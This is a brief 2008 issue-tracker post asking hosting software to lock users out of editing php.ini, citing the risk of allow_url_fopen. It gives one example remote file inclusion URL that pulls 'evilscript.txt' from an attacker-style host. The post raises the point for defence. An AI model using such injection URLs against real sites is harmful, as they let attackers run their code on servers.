Submitted by sgrayban on Mon, 04/14/2008 - 02:09
I would like to disable the domain owners from editing there own php.ini file simply because of security issues.
Most people have no idea how to properly set there ini file up and I see no reason to let them when they could possibly open the server up to attacks. And seeing that you are already setting the cgi/fcgi wrappers to chattr +i it would be more difficult for them to bypass the ini file to use.
The biggest concern I have is allowing allow_url_fopen = On which oppens a whole new set of hacks in. Notably the infamous http://example.com/index.php?page=http://crackerscum.net/evilscript.txt injection.
Status:
Closed (fixed)